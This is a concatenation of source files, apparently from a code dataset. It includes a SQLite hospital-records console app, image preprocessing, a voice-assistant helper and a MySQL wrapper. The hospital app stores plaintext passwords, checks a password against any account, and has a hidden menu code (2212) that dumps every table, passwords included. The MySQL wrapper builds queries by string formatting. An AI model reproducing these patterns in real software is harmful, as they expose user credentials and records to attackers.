ob.mode == 'EDIT':\n\n row = layout.row()\n row.operator(\"object.vertex_group_balance\")\n row.prop_search(context.scene, \"vgai2\", context.active_object, \"vertex_groups\", text=\"\")\n\ndef register():\n bpy.utils.register_class(OT_BALANCE_VG)\n bpy.types.DATA_PT_vertex_groups.append(add_vertex_group_tools)\n\ndef unregister():\n bpy.utils.unregister_class(OT_BALANCE_VG)\n bpy.types.DATA_PT_vertex_groups.remove(add_vertex_group_tools)\n\nif __name__ == \"__main__\":\n register()\n\n","sub_path":"scripts/addons_extern/metatool_addon/vert_balance_vertex_groups.py","file_name":"vert_balance_vertex_groups.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279260672","text":"import os\nimport logging\n\nos.chdir(r'G:\\cnx\\projects\\udacity\\Self-Driving Cars\\1 - Computer Vision, Deep Learning and Sensor\\Project 3 - Traffic Sign Classifier\\local')\n\nimport Display\n\nFORMAT = '%(module)-15s:%(levelname)-5s:%(message)s'\nlogging.basicConfig(format=FORMAT, level=logging.DEBUG)\nlogging.getLogger(\"display\").setLevel(logging.DEBUG)\n\nlogging.info(\"Main file\")\nlogging.debug(\"Test\")\n\ninput = r'G:/cnx/projects/udacity/Self-Driving Cars/1 - Computer Vision, Deep Learning and Sensor/Project 2 - Advanced Lane Finding/test_images'\noutput = r'G:/test/'\na = Display.Image(input, output)\na.run()\n","sub_path":"Self-Driving Cars/1 - Computer Vision, Deep Learning and Sensor/Project 3 - Traffic Sign Classifier/local/display_test.py","file_name":"display_test.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"498384341","text":"import getpass\r\nimport sqlite3\r\nconnection=sqlite3.connect('hospital.db')\r\ncursor=connection.cursor()\r\nerror=1\r\nfrom os import system, name\r\ndef screen_clear():\r\n if name == 'nt':\r\n _ = system('cls')\r\n else:\r\n _ = system('clear')\r\ncursor.execute(\"\"\"select count(name) from sqlite_master where type='table' and name='doctor'\"\"\")\r\nif cursor.fetchone()[0]==0:\r\n cursor.execute(\"\"\"CREATE TABLE doctor ( \r\n d_id number primary key, \r\n dnamedfirst VARCHAR2(20), \r\n dnamedlast VARCHAR2(30), \r\n password varchar2(20) not null,\r\n speciality varchar2(40) not null,\r\n shift varchar2(10) not null,\r\n phone number(10) not null);\"\"\")\r\ncursor.execute(\"\"\"select count(name) from sqlite_master where type='table' and name='patient'\"\"\")\r\nif cursor.fetchone()[0]==0:\r\n cursor.execute(\"\"\"CREATE TABLE patient ( \r\n p_id number primary key, \r\n pfirst VARCHAR2(20), \r\n pdlast VARCHAR2(30), \r\n City varchar2(20) not null,\r\n DOB date not null,\r\n age number not null,\r\n DOA date not null,\r\n number number(10) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE virus ( \r\n p_id number not null, \r\n dname VARCHAR2(20) primary key,\r\n vname VARCHAR2(20), \r\n treatment VARCHAR2(50), \r\n symptoms varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE bacteria ( \r\n p_id number not null, \r\n dname VARCHAR2(20) primary key,\r\n bname VARCHAR2(20), \r\n treatment VARCHAR2(50), \r\n symptoms varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE injury ( \r\n p_id number not null, \r\n iname VARCHAR2(20) primary key,\r\n idiagnosis VARCHAR2(50), \r\n type varchar2(50) not null);\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(101,'Mohit','Nayak','Bangalore','15-March-2001',18,'08-March-2020',9078435952)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(102,'Anikiat','Saraf','Kolkata','22-Dec-2000','19','15-Feb-2020',9674825476)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(103,'Rishank','Pratik','Orissa','22-Dec-2001','18','19-Nov-2015',9117854569)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(104,'Risav','Jana','Nepal','06-Jan-2001',18,'25-Oct-2010',7854963284)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(105,'Wilson','Vidyut','Mumbai','23-Nov-2001',18,'23-Nov-2005',7854129645)\"\"\")\r\n cursor.execute(\"\"\"insert into patient values(106,'Dinesh','Sharma','Rajasthan','23-Feb-2000',20,'23-Feb-2000',8476423858)\"\"\")\r\n cursor.execute(\"\"\"insert into virus values(103,'Ebola','Ebov','Oxygen Therapy, IV Fluids','Muscle Pain, Fever, Bleeding')\"\"\")\r\n cursor.execute(\"\"\"insert into virus values(105,'Measles','Paramyxo','Vitamin A','Cough, Skin Rash')\"\"\")\r\n cursor.execute(\"\"\"insert into bacteria values(101,'TB','Mycobacterium','Antibiotics','Cough and Sneezes')\"\"\")\r\n cursor.execute(\"\"\"insert into bacteria values(106,'Cholera','Vibrio','IV Fluids, Antibiotics','Seizures, Diarrhoea')\"\"\")\r\n cursor.execute(\"\"\"insert into injury values(102,'Hair line Fracture','Plaster, Pain Killer','Toe Fracture')\"\"\")\r\n cursor.execute(\"\"\"insert into injury values(104,'bullet wound','Removal of Bullet','Wound')\"\"\")\r\n print(\"Databse created successfully\")\r\n \r\nelse:\r\n e=1\r\n while e!=0:\r\n e=int(input(\"1. Sign In\\n2. Create a New Doctor Account\\n\"))\r\n if e==2:\r\n did=int(input('\\nEnter id - '))\r\n dnf=input('Enter first name - ')\r\n dnl=input('Enter last name - ')\r\n pas=getpass.getpass('Enter password - ')\r\n spec=input('Enter speciality - ')\r\n shf=input('Enter working shift - ')\r\n ph=int(input('Enter phone number - '))\r\n cursor.execute(\"\"\"insert into doctor values(?,?,?,?,?,?,?)\"\"\",(did,dnf,dnl,pas,spec,shf,ph))\r\n screen_clear()\r\n e=1\r\n elif e==1:\r\n while error==1:\r\n i=input(\"\\nEnter your ID - \")\r\n p=getpass.getpass(\"Enter your Password - \")\r\n cursor.execute(\"\"\"select count(d_id) from doctor where d_id=(?)\"\"\",(i,))\r\n if cursor.fetchone()[0]==1:\r\n cursor.execute(\"\"\"select count(password) from doctor where password=?\"\"\",(p,))\r\n if cursor.fetchone()[0]==1:\r\n print(\"\\nSign in successful!\")\r\n screen_clear()\r\n error=0\r\n e=0\r\n r=1\r\n cursor.execute(\"\"\"select d_id,dnamedfirst,dnamedlast,speciality,shift,phone from doctor where d_id=(?)\"\"\",(i,))\r\n for row in cursor.fetchall():\r\n print(\"ID -\",row[0],\" Name -\",row[1], row[2],\" Speciality -\",row[3],\"\\nShift -\",row[4],\" Phone Number -\",row[5])\r\n while r!=0:\r\n print(\"\\n1. View Patient details\\n2. Add a New Patient\\n3. Delete Patient Details\\n0. Exit\")\r\n r=int(input())\r\n if r==1:\r\n access=input(\"\\nEnter Patient ID:- \")\r\n cursor.execute(\"\"\"select count(*) from patient where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from patient where p_id=(?)\"\"\",(access,))\r\n print(\"\\nPatient Details - \")\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"First Name: \", row[1])\r\n print(\"Last Name: \", row[2])\r\n print(\"City: \", row[3])\r\n print(\"Date of Birth: \", row[4])\r\n print(\"Age: \", row[5])\r\n print(\"Date of Admission: \", row[6])\r\n print(\"\\nDiagnosis Report - \")\r\n cursor.execute(\"\"\"select count(*) from virus where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from virus where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Disease Name: \", row[1])\r\n print(\"Virus Name: \", row[2])\r\n print(\"Treatment: \", row[3])\r\n print(\"Symptoms: \", row[4])\r\n print(\"\\n\")\r\n cursor.execute(\"\"\"select count(*) from bacteria where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from bacteria where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Disease Name: \", row[1])\r\n print(\"Bacteria Name: \", row[2])\r\n print(\"Treatment: \", row[3])\r\n print(\"Symptoms: \", row[4])\r\n print(\"\\n\")\r\n cursor.execute(\"\"\"select count(*) from injury where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"select * from injury where p_id=(?)\"\"\",(access,))\r\n for row in cursor.fetchall():\r\n print(\"Id: \", row[0])\r\n print(\"Injury Name: \", row[1])\r\n print(\"Diagnosis Name: \", row[2])\r\n print(\"Type: \", row[3])\r\n print(\"\\n\")\r\n else:\r\n print(\"Incorrect Patient id\")\r\n elif r==2:\r\n pid=int(input('\\nEnter id - '))\r\n pnf=input('Enter first name - ')\r\n pnl=input('Enter last name - ')\r\n pcity=input('Enter city - ')\r\n pdob=input('Enter date of birth - ')\r\n page=int(input('Enter age - '))\r\n pdoa=input('Enter date of admission - ')\r\n pnum=int(input('Enter phone number - '))\r\n cursor.execute(\"\"\"insert into patient values(?,?,?,?,?,?,?,?)\"\"\",(pid,pnf,pnl,pcity,pdob,page,pdoa,pnum))\r\n print(\"\\n1. Virus\\n2. Bacteria\\n3. Injury\")\r\n m=int(input())\r\n if m==1:\r\n dname=input(\"\\nEnter disease name - \")\r\n bname=input(\"Enter virus name - \")\r\n treatment=input(\"Enter treatment - \")\r\n symptoms=input(\"Enter symptoms - \")\r\n cursor.execute(\"\"\"insert into virus values(?,?,?,?,?)\"\"\",(pid,dname,bname,treatment,symptoms))\r\n elif m==2:\r\n dname=input(\"\\nEnter disease name - \")\r\n bname=input(\"Enter bacteria name - \")\r\n treatment=input(\"Enter treatment - \")\r\n symptoms=input(\"Enter symptoms - \")\r\n cursor.execute(\"\"\"insert into bacteria values(?,?,?,?,?)\"\"\",(pid,dname,bname,treatment,symptoms))\r\n elif m==3:\r\n iname=input(\"\\nEnter injury name - \")\r\n idiag=input(\"Enter diagnosis - \")\r\n itype=input(\"Enter injury type - \")\r\n cursor.execute(\"\"\"insert into injury values(?,?,?,?)\"\"\",(pid,iname,idiag,itype))\r\n print(\"\\nPatient Added\")\r\n connection.commit()\r\n elif r==3:\r\n access=input(\"\\nEnter Patient ID:- \")\r\n cursor.execute(\"\"\"select count(*) from patient where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from patient where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from virus where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from virus where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from bacteria where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from bacteria where p_id=(?)\"\"\",(access,))\r\n cursor.execute(\"\"\"select count(*) from injury where p_id=(?)\"\"\",(access,))\r\n if cursor.fetchone()[0]!=0:\r\n cursor.execute(\"\"\"delete from injury where p_id=(?)\"\"\",(access,))\r\n else:\r\n print(\"Incorrect Patient id Patient does not exist\")\r\n print(\"\\nPatient Deleted\")\r\n connection.commit()\r\n elif r==0:\r\n break\r\n else:\r\n print(\"Incorrect passoword. Please retry \")\r\n else:\r\n print(\"Incorrect User ID. Please retry \")\r\n break\r\n elif e==2212:\r\n cursor.execute(\"\"\"select * from doctor\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from virus\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from bacteria\"\"\")\r\n print(cursor.fetchall())\r\n cursor.execute(\"\"\"select * from injury\"\"\")\r\n print(cursor.fetchall())\r\n break\r\nconnection.commit()\r\nconnection.close()\r\nprint(\"\")\r\ndef progress(status, remaining, total):\r\n print(f'Copied {total-remaining} of {total} pages...')\r\n\r\ntry:\r\n sqliteCon = sqlite3.connect('hospital.db')\r\n backupCon = sqlite3.connect('hospital_backup.db')\r\n with backupCon:\r\n sqliteCon.backup(backupCon, pages=1, progress=progress)\r\n print(\"backup successful\")\r\nexcept sqlite3.Error as error:\r\n print(\"Error while taking backup: \", error)\r\nfinally:\r\n if(backupCon):\r\n backupCon.close()\r\n sqliteCon.close()\r\n","sub_path":"Doctor.py","file_name":"Doctor.py","file_ext":"py","file_size_in_byte":13109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"413373878","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plot\nimport os\nimport json\nimport copy\nimport time\nimport shutil\nfrom dataUtils import shutildata\n\n\ndef cut(img):\n # img = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 17, 6)\n img = copy.deepcopy(img)\n img = np.asarray(img)\n img[img > 127] = 255\n img[img <= 127] = 1\n img[img == 255] = 0\n\n cols = np.sum(img, 0)\n rows = np.sum(img, 1)\n # print(cols)\n\n x1 = 0\n y1 = 0\n y2, x2 = img.shape\n y2 -= 1\n x2 -= 1\n\n for i in range(len(cols)):\n if cols[i] > 0:\n x1 = i\n break\n\n for i in range(len(cols)):\n if cols[len(cols) - 1 - i] > 0:\n x2 = len(cols) - 1 - i\n break\n\n for i in range(len(rows)):\n if rows[i] > 0:\n y1 = i\n break\n\n for i in range(len(rows)):\n if rows[len(rows) - 1 - i] > 0:\n y2 = len(rows) - 1 - i\n break\n\n return x1, x2, y1, y2\n\n\ndef resize(img):\n width, height = img.shape\n if width > height:\n wider = (width - height) // 2\n img=cv2.copyMakeBorder(img,0,0,wider,wider,cv2.BORDER_CONSTANT, value=[255, 255, 255])\n\n elif height>width:\n wider=(height - width)//2\n img=cv2.copyMakeBorder(img, wider, wider,0,0, cv2.BORDER_CONSTANT, value=[255, 255, 255])\n return img\n\n# a-z\ndef makeOringinData(path):\n datapath=\"E:\\\\PythonProject\\\\CNN_Pinyin/Data/originData/\"\n if os.path.exists(datapath):\n shutil.rmtree(datapath)\n\n os.mkdir(datapath)\n\n with open('num_char.json', 'r') as f:\n dict = json.loads(f.read())\n\n for i in os.listdir(path):\n char = i\n pre_name=dict[str(char)]+'_'\n print(pre_name)\n imgPath = path + char + '/'\n count = 0\n savaPath = datapath+ char + '/'\n print(savaPath)\n\n dirlist=os.listdir(imgPath)\n if len(dirlist) == 0:\n continue\n\n if os.path.exists(savaPath):\n shutil.rmtree(savaPath)\n\n if not os.path.exists(savaPath):\n os.mkdir(savaPath)\n\n for i in dirlist:\n img = cv2.imread(imgPath + i, 0)\n temp=img\n print(i)\n try:\n width,height=img.shape\n except:\n continue\n if not width==height:\n x1, x2, y1, y2 = cut(img)\n if x1 == x2 or y1 == y2:\n continue\n print(x1, x2, y1, y2)\n temp = img[y1:y2, x1:x2]\n temp=resize(temp)\n temp = cv2.resize(temp, (28, 28))\n\n cv2.imwrite(savaPath + pre_name + str(count) + '.jpg', temp)\n count += 1\n\n\nif __name__ == '__main__':\n\n path = 'C:\\\\Users\\\\MarkXu\\\\Desktop\\\\dst\\\\chars/'\n makeOringinData(path)\n shutildata('Data/originData/', 'Data/train/', 'Data/test/')\n\n\n\n","sub_path":"MakeData.py","file_name":"MakeData.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"607256855","text":"import numpy as np\nimport mercantile as m\n\ndef single_point(row,bound,deltax,deltay):\n\tfactorx = (row[0] - bound.west) / deltax\n\tfactory = (bound.north - row[1]) / deltay\n\n\txval = int(factorx * 4096)\n\tyval = int(factory * 4096)\n\n\treturn [xval,yval]\n\ndef get_convert_values(key):\n\tz,x,y = str.split(key,'/')[1:]\n\n\tbound = m.bounds(m.Tile(int(x), int(y), int(z)))\n\tdeltax,deltay = (bound.east - bound.west),(bound.north - bound.south)\n\n\treturn bound,deltax,deltay\n\n\ndef convert_all(key,coordss):\n\t#newlist = []\n\tbound,deltax,deltay = get_convert_values(key)\n\t#for coords in coordss:\n\treturn [[single_point(i,bound,deltax,deltay) for i in coords] for coords in coordss]\n\t#return newlist\n","sub_path":"python_vtile/coords.py","file_name":"coords.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"579115373","text":"from setuptools import setup\n\nMAJOR = 0\nMINOR = 1\nRELEASE = 5\n\nsetup(\n name=\"Thalassa\",\n version=\"%s.%s.%s\" % (MAJOR, MINOR, RELEASE),\n description=\"TBD\",\n url=\"https://github.com/Arrekin/Thalassa\",\n author=\"Daniel Misior\",\n packages=[\n \"thalassa\",\n \"thalassa.database\",\n ],\n install_requires=[\n \"Twisted\",\n \"sqlalchemy\",\n \"greenstalk\"\n ],\n)\n","sub_path":"ThalassaCore/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"395824898","text":"# import speech_recognition as sr\nimport os\n# from gtts import gTTS\nimport warnings\nimport calendar\nimport random\nimport wikipedia\nimport datetime\n# from playsound import playsound\nimport pytz\nimport autocorrect\n\n\n# ignoring warnings\nwarnings.filterwarnings('ignore')\n\nspell = autocorrect.Speller(lang='en')\n\n# # recording audio and return it as a string\n# def record_audio():\n\n# # record audio\n# r = sr.Recognizer() # Recognizer object\n\n# # opening mic to record\n# with sr.Microphone() as source:\n# print('Say Something')\n# audio = r.listen(source)\n\n# data = \"\"\n# try:\n# data = r.recognize_google(audio)\n# print(data)\n# except sr.UnknownValueError: # check for unknown errors\n# return ('Speech not recognised')\n# except sr.RequestError:\n# return ('You got disconnected, please try again !')\n\n# return data\n\n# # function to convert text to speech\n# def assistant_response(text):\n# if text == \"\":\n# text = \"Sorry\"\n# t_t_s = gTTS(text=text, lang = 'en', slow = False)\n\n# # getting current path\n# current_path = os.path.realpath(__file__)\n# # saving audio\n# t_t_s.save(current_path[:-9].replace('\\\\','/') + \"/audio_response/assistant_reply.mp3\")\n\n# playsound(current_path[:-9].replace('\\\\','/') + \"/audio_response/assistant_reply.mp3\")\n\n\n\n# check it to wake up\ndef wake_up(text):\n wake_words = [\"hey buddy\",\"hi buddy\",\"hello buddy\",\"listen buddy\"]\n for word in wake_words:\n if word in text.lower():\n return True\n\n return False\n\n# get date\ndef getDate():\n\n now = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\n my_date = datetime.datetime.today()\n weekday = calendar.day_name[my_date.weekday()]\n month = now.strftime(\"%B\")\n\n date_today = now.strftime(\"%d\")\n\n if date_today == '1':\n date_today += 'st'\n elif date_today == '2':\n date_today += 'nd'\n elif date_today == '3':\n date_today += 'rd'\n else:\n date_today += 'th'\n\n return f\"Today is {weekday} ,{month} {(date_today)} {now.year}\"\n\n# get time\ndef getTime():\n\n now = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\n hr = now.hour\n minute = now.minute\n mer = \"a.m.\"\n\n if hr >= 12:\n mer = 'p.m.'\n hr = int(hr) - 12\n \n\n return f\"Its {hr} : {minute} {mer}\"\n\n# greetings\ndef greeting(text):\n\n # user inputs\n greets = ['hi','hello','hey','greetings','wassup','what\\'s up','whats up','hello','hey there']\n\n # buddy response\n my_greets = ['hi','hello','hey','greetings','wassup','what\\'s up','whats up','hello','hey there']\n\n for word in greets:\n if word in text.lower():\n return random.choice(my_greets) + '.'\n\n return ''\n\ndef end_conv(text):\n\n # user inputs\n greets = ['bye','see you','goodbye','good bye','exit','leave','go','tata','see ya']\n\n # buddy response\n my_greets = ['bye','see you later',\"see you soon\",\"your are really cool\",\"will talk to you later\",\"byeee\",'goodbye','good bye','tata','see ya']\n\n for word in greets:\n if word in text.lower():\n return random.choice(my_greets) + '.'\n\n return ''\n\ndef getName(text):\n wordList = text.split()\n return text\n for i in range(len(wordList)):\n if i+3 <= len(wordList) - 1 and wordList[i].lower() == 'who' and wordList[i] == 'is':\n return wordList[i+2] + ' ' + wordList[i+3]\n elif i+2 <= len(wordList) - 1 and wordList[i].lower() == 'who' and wordList[i] == 'is':\n return wordList[i+2]\n\ndef spell_check(word_list):\n # checked_list = []\n for i in range(len(word_list)):\n word_list[i] = spell(word_list[i])\n return \" \".join(word_list)\n\n# search for keywords\n# def wiki_search(text):\n\n\ndef get_emoji():\n\n # user inputs\n my_icons=[ \"😀\", \"😃\", \"😄\", \"😁\", \"😆\", \"😅\", \"😂\", \"🤣\", \"☺️\", \"😊\", \"😇\", \"🙂\", \"🙃\", \"😉\", \"😌\", \"😍\", \"🥰\", \"😘\", \"😗\", \"😙\", \"😚\", \"😋\", \"😛\", \"😝\", \"😜\", \"🤪\", \"🤨\", \"🧐\", \"🤓\", \"😎\", \"🤩\", \"🥳\", \"😏\", \"😒\", \"😞\", \"😔\", \"😟\", \"😕\", \"🙁\", \"☹️\", \"😣\", \"😖\", \"😫\", \"😩\", \"🥺\", \"😢\", \"😭\", \"😤\", \"😠\", \"😡\", \"🤬\", \"🤯\", \"😳\", \"🥵\", \"🥶\", \"😱\", \"😨\", \"😰\", \"😥\", \"😓\", \"🤗\", \"🤔\", \"🤭\", \"🤫\", \"🤥\", \"😶\", \"😐\", \"😑\", \"😬\", \"🙄\", \"😯\", \"😦\", \"😧\", \"😮\", \"😲\", \"🥱\", \"😴\", \"🤤\", \"😪\", \"😵\", \"🤐\", \"🥴\", \"🤢\", \"🤮\", \"🤧\", \"😷\", \"🤒\", \"🤕\", \"🤑\", \"🤠\", \"😈\", \"👿\", \"👹\", \"👺\", \"🤡\", \"💩\", \"👻\", \"💀\", \"☠️\", \"👽\", \"👾\", \"🤖\", \"🎃\", \"😺\", \"😸\", \"😹\", \"😻\", \"😼\", \"😽\", \"🙀\", \"😿\", \"😾\" ]\n \n\n return random.choice(my_icons)\n\n\n\n\n ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584855251","text":"from __future__ import print_function, division\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nfrom game2048.game import Game\nfrom game2048.displays import Display\n\n\nclass myDataset(Dataset):\n\n def __init__(self):\n self.board = []\n self.direction = []\n\n def add(self, getboard, getdirection):\n self.board.append(getboard)\n self.direction.append(getdirection)\n\n def __len__(self):\n return len(self.board)\n\n def __getitem__(self, idx):\n myBoard = self.board[idx]\n myDirection = self.direction[idx]\n return myBoard, myDirection\n\n\ndef single_run(size, ds, AgentClass, **kwargs):\n game = Game(size, 2048)\n agent = AgentClass(game, display=Display(), **kwargs)\n agent.play(dataset=ds, verbose=False, train=1)\n\n\nif __name__ == '__main__':\n GAME_SIZE = 4\n N_TESTS = 1000\n\n '''====================\n Use your own agent here.'''\n from game2048.agents import ExpectiMaxAgent as TestAgent\n '''===================='''\n\n scores = []\n dataset = myDataset()\n for _ in range(N_TESTS):\n\n single_run(GAME_SIZE, ds=dataset, AgentClass=TestAgent)\n np.save(\"b16\", dataset.board)\n np.save(\"d16\", dataset.direction)\n print(len(dataset))\n\n","sub_path":"2048/game2048/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"34750387","text":"import mysql.connector\nimport pickle\n\nwith open(\"ward.pickle\",\"rb\") as picklefile:\n database_name=pickle.load(picklefile)['id']\nprint(database_name)\n\nclass database:\n def __init__(self,hostname,user,dbase,pword=\"\"):\n try:\n self.mydb=mysql.connector.connect(\n host=hostname,\n user=user,\n password=pword,\n )\n except Exception as e:\n print(\"Not Connected to database.\")\n print(e)\n\n def insertintowadatable(self,name,address,about):\n #INSERT INTO `smartward`.`ward_registration` (ID,Municipality,WardNo,State,Address,Phone,Email,IP_Address,LogoPath,Password) VALUES('1','A','B','2','sgjkf','8935734','C','576','231','123')\n mycursor=self.mydb.cursor()\n sql=\"INSERT INTO wada(wada_name,wada_address,wada_info) VALUES (%s,%s,%s)\"\n val=(name,address,about) \n mycursor.execute(sql,val) \n self.mydb.commit()\n print(\"insert successful.\")\n mycursor.close()\n\nclass database_signinwindow(database):\n def __init__(self,hostname,user,dbase,pword=\"\"):\n super().__init__(hostname,user,dbase,pword)\n self.mycursor=self.mydb.cursor()\n\n def createWardTable(self):\n try:\n #\"CREATE TABLE `departments` (\"\" `dept_no` char(4) NOT NULL,\"\" `dept_name` varchar(40) NOT NULL,\"\" PRIMARY KEY (`dept_no`), UNIQUE KEY `dept_name` (`dept_name`)\"\") ENGINE=InnoDB\"\n sql=\"CREATE TABLE `smartward`.`ward_registration` ( `ID` VARCHAR(30) NOT NULL , `Municipality` VARCHAR(75) NOT NULL , `WardNo` VARCHAR(5) NOT NULL , `State` VARCHAR(5) NOT NULL , `Address` VARCHAR(150) NOT NULL , `Phone` VARCHAR(15) NOT NULL , `Email` VARCHAR(50) NOT NULL , `IP_Address` VARCHAR(15) NOT NULL , `LogoPath` VARCHAR(150) NOT NULL , `Password` VARCHAR(16) NOT NULL , PRIMARY KEY (`ID`)) ENGINE = InnoDB\"\n self.mycursor.execute(sql)\n self.mydb.commit()\n print(\"table created.\")\n self.mycursor.close()\n except Exception as e:\n print(\"table already exists\")\n\n def checkValid(self,municipality,ward):\n sql=\"SELECT * FROM `smartward`.`ward_registration` WHERE Municipality=%s AND WardNo=%s\"\n self.mycursor.execute(sql,(municipality,ward))\n if(self.mycursor.fetchall()):\n return False\n return True\n\n def checkEmailValid(self,email):\n sql=\"SELECT * FROM `smartward`.`ward_registration` WHERE Email=%s\"\n self.mycursor.execute(sql,(email,))\n if(self.mycursor.fetchall()):\n return False\n return True\n\n def InsertIntoward_registrationTable(self,id,municipality,wardno,state,address,phone,email,ip,logopath,pword):\n try:\n sql=\"INSERT INTO `smartward`.`ward_registration` (ID,Municipality,WardNo,State,Address,Phone,Email,IP_Address,LogoPath,Password) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n val=(id,municipality,wardno,state,address,phone,email,ip,logopath,pword)\n self.mycursor.execute(sql,val)\n self.mydb.commit()\n self.mycursor.close()\n return True\n except Exception:\n print(\"insert failed\")\n return False\n\n def checkLoginValidity(self,id,pswd):\n sql = \"SELECT * FROM `smartward`.`ward_registration` WHERE ID=%s OR Email=%s\"\n self.mycursor.execute(sql, (id,id))\n login_details=self.mycursor.fetchall()\n if(login_details):\n if(pswd==login_details[0][-1]):\n return login_details[0][-3],login_details[0][-4],login_details[0][0]\n return \"invalid\",\"\",\"\"\n\n def checkEmailValidity(self,email):\n sql = \"SELECT * FROM `smartward`.`ward_registration` WHERE Email=%s\"\n self.mycursor.execute(sql, (email,))\n return self.mycursor.fetchall()\n\n def updateIP(self,id,ip):\n try:\n sql=\"UPDATE `smartward`.`ward_registration` SET IP_Address=%s WHERE ID=%s OR Email=%s\"\n self.mycursor.execute(sql,(ip,id,id))\n self.mydb.commit()\n self.mycursor.close()\n except Exception:\n print(\"Ip update unsucessful\")\n\n def createDatabase(self):\n self.mycursor.execute(\"CREATE DATABASE 3hu4\")\n self.mydb.commit()\n self.mycursor.close()\n\nclass database_wardwindow(database):\n def __init__(self,hostname,user,dbase=database_name,pword=\"\"):\n super().__init__(hostname, user, dbase, pword)\n self.mycursor = self.mydb.cursor()\n try:\n self.mycursor.execute(\"CREATE DATABASE {0}\".format(dbase))\n self.mydb.commit()\n except Exception:\n pass\n self.mycursor.execute(\"USE {0}\".format(dbase))\n self.mydb.commit()\n\n\n def createFormTable(self,tablename):\n try:\n sql=\"CREATE TABLE {0} (RegDate VARCHAR(10) NOT NULL,RegNo VARCHAR(15) NOT NULL, PRIMARY KEY(RegNo)) ENGINE=InnoDB\".format(tablename)\n self.mycursor.execute(sql)\n self.mydb.commit()\n except Exception as e:\n print(e)\n return\n\n def addColumns(self,tablename,*columns):\n try:\n for column in columns:\n sql=\"ALTER TABLE {0} ADD COLUMN {1} VARCHAR(1600)\".format(tablename,column)\n self.mycursor.execute(sql)\n self.mydb.commit()\n except Exception:\n return\n\n def insertValues(self,tablename,columnandvaluselist):\n csv=columnandvaluselist\n print(csv)\n sql=\"INSERT INTO {0} ({1},{2}) VALUES ('{3}','{4}')\".format(tablename,csv[0],csv[2],csv[1],csv[3])\n self.mycursor.execute(sql)\n self.mydb.commit()\n for i in range(4,len(csv),2):\n sql=\"UPDATE {0} SET {1}='{2}' WHERE {3}='{4}'\".format(tablename,csv[i],csv[i+1],csv[0],csv[1])\n self.mycursor.execute(sql)\n self.mydb.commit()\n print(\"Ok\")\n\n def getRowCount(self,column,tablename,value):\n sql = \"SELECT {0} FROM {1} WHERE {0} LIKE '{2}'\".format(column,tablename,value)\n self.mycursor.execute(sql)\n rows=self.mycursor.fetchall()\n if(rows):\n return len(rows)\n return 0\n#a=database_wardwindow(\"localhost\",\"root\",\"3zxc3\")\n#a.createFormTable(\"gshs\")\n#a.addColumns(\"gshs\",\"Ajh\",\"sdkjjhv\",\"hjgd\")\n#print(a.getRowCount('RegDate','marriageregistration',\"2076/01/%\"))\n\n","sub_path":"Smartward/forms/sifaris/dbconnect.py","file_name":"dbconnect.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454466255","text":"import tkinter as tk\nimport Functions4 as fn\n\nclass Main(tk.Frame):\n\n\tN = 3\n\tPlayer = \"x\"\n\tIndent = 3\n\tHeader = None\n\tPCFirst = True\n\tGameOver = False\n\tGameField = []\n\tButtons = []\n\tActive = 